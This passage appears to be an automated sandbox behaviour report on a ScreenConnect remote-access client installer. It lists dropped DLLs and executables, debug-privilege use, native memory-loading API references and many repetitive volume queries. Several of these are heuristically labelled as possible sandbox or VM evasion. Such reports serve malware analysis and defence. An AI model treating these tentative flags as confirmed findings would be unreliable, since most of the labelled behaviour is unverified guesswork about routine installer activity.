Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Memory allocated: 1870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Memory allocated: 1FA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Memory allocated: 1DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Memory allocated: 980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Memory allocated: 1A380000 memory reserve \| memory write watch	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.InstallerActions.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsCredentialProvider.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsAuthenticationPackage.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.Compression.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.Compression.Cab.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI1608.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI17AE.tmp	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe TID: 7696	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe TID: 7936	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7888	Thread sleep time: -30000s >= -30000s	Jump to behavior

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: svchost.exe, 00000008.00000002.2942015906.0000017F93258000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2940590686.0000017F8DC2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2948001083.0000000005508000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: ScreenConnect.ClientService.dll.1.dr, ClientService.cs	Reference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT \| WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1732916566.0000000000042000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr	Binary or memory string: Progman
Source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1732916566.0000000000042000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr	Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
